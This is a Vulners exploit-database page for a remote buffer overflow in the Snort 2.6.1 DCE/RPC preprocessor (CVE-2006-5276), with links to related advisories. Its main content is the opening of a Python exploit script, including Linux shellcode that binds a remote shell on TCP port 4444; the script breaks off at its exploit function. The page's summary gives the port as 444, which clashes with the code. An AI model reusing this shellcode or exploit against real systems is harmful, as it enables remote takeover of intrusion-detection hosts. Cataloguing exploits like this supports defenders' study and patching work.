Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Snort 2.6.1 DCE/RPC Preprocessor Remote Buffer Overflow Exploit (linux)

🗓️ 03 Apr 2007 00:00:00Reported by RootType 
seebug
 seebug🔗 www.seebug.org👁 46 Views

Snort DCE/RPC Preprocessor Remote Buffer Overflow Exploit (linux) - shellcode for portbind shell on TCP port 444

Related
Code
ReporterTitlePublishedViews
Family
0day.today		Snort 2 DCE/RPC preprocessor Buffer Overflow
9 Apr 201200:00
zdt
0day.today		Snort 2 DCE/RPC preprocessor Buffer Overflow
6 Jun 201200:00
zdt
0day.today		Snort 2.6.1 DCE/RPC Preprocessor Remote Buffer Overflow Exploit (linux)
30 Mar 200700:00
zdt
FreeBSD		snort -- DCE/RPC preprocessor vulnerability
19 Feb 200700:00
freebsd
Circl		CVE-2006-5276
9 Apr 201200:00
circl
Check Point Advisories		Preemptive Protection against Sourcefire Intrusion Sensor and Snort DCE/RPC Preprocessor Buffer Overflow Vulnerability
29 Mar 200700:00
checkpoint_advisories
CVE		CVE-2006-5276
20 Feb 200700:00
cve
Cvelist		CVE-2006-5276
20 Feb 200700:00
cvelist
Debian CVE		CVE-2006-5276
20 Feb 200700:00
debiancve
Exploit DB		Snort 2 - DCE/RPC Preprocessor Buffer Overflow (Metasploit)
9 Apr 201200:00
exploitdb
Rows per page

                                                #!/usr/bin/python
#
# Remote exploit for Snort DCE/RPC preprocessor vulnerability as described in
# CVE-2006-5276. The exploit binds a shell to TCP port 4444 and connects to it.
# This code was tested against snort-2.6.1 running on Red Hat Linux 8
#
# Author shall bear no responsibility for any screw ups caused by using this code
# Winny Thomas :-)

import os
import sys
import time
from scapy import *

# Linux portbind shellcode; Binds shell on TCP port 4444
shellcode  = \"x31xdbx53x43x53x6ax02x6ax66x58x99x89xe1xcdx80x96\"
shellcode += \"x43x52x66x68x11x5cx66x53x89xe1x6ax66x58x50x51x56\"
shellcode += \"x89xe1xcdx80xb0x66xd1xe3xcdx80x52x52x56x43x89xe1\"
shellcode += \"xb0x66xcdx80x93x6ax02x59xb0x3fxcdx80x49x79xf9xb0\"
shellcode += \"x0bx52x68x2fx2fx73x68x68x2fx62x69x6ex89xe3x52x53\"
shellcode += \"x89xe1xcdx80\"

def ExploitSnort(target):
       # SMB packet borrowed from http://www.milw0rm

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
03 Apr 2007 00:00Current
0.6Low risk
Vulners AI Score0.6
EPSS0.8816
snortdce/rpcpreprocessorremote buffer overflowexploitlinuxshellcodeportbindtcp port 4444cve-2006-5276red hat
46